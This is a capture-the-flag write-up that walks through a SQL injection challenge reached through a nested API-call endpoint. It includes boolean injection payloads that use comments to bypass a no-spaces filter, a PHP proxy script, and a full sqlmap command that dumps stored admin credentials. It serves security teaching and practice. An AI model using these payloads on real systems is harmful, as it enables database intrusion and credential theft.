Triskel 2: Going In
SQL Injection
Problem
What did you do? You shouldn't have access to this chat, but you can't do anything from it right?
by Remsio
Solution
Taking a closer look at 10.0.42.200
, we can see that there is a GET form with the search
parameter.

Hence, we can use
GET /api/call_api.php?api=10.0.42.200?search=
Testing out some basic payloads showed that SQL injection was possible, but spaces aren't allowed. Luckily, in MySQL, we can replace the spaces with comments (/**/
).
We can see that
/api/call_api.php?api=10.0.42.200/?search=admin_richard_lauren'/**/OR/**/'1'='1
returns us all the messages, while
/api/call_api.php?api=10.0.42.200/?search=admin_richard_lauren'/**/OR/**/'1'='2
does not.
I could have scripted this myself, but I decided it was too much work and just relied on good ol' SQLMap. However, it required some fine-tuning to make sure SQLMap performs the injection correctly.
We're doing a "GET request within a GET request", so SQLMap gets confused. I set up a local HTTP proxy as follows:
<?php
// create a new cURL resource
$ch = curl_init();
// set URL and other appropriate options
curl_setopt($ch, CURLOPT_URL, 'http://10.35.2.134:8100/api/call_api.php?api=10.0.42.200?search=' . $_GET['search']);
curl_setopt($ch, CURLOPT_HEADER, false);
// grab URL and pass it to the browser
echo curl_exec($ch);
// close cURL resource, and free up system resources
curl_close($ch);
?>
Then, we can run SQLMap:
sqlmap http://127.0.0.1/test.php?search=abc -p search --tamper=space2comment --technique=B --risk 3 --dump --threads 10 -D db -T internal_api_infos
Note that we specify:
-p search
: inject through the search parameter--tamper=space2comment
: modify the queries such that spaces are replaced by/**/
--technique=B
: use boolean-based injection--risk 3
: attempt OR boolean-based injection (which we found earlier)
We get the admin credentials, which we can use to login to the first webpage.

The remaining credentials are shown below:

This allows us to access the Admin page, which contains the flag.

Last updated
Was this helpful?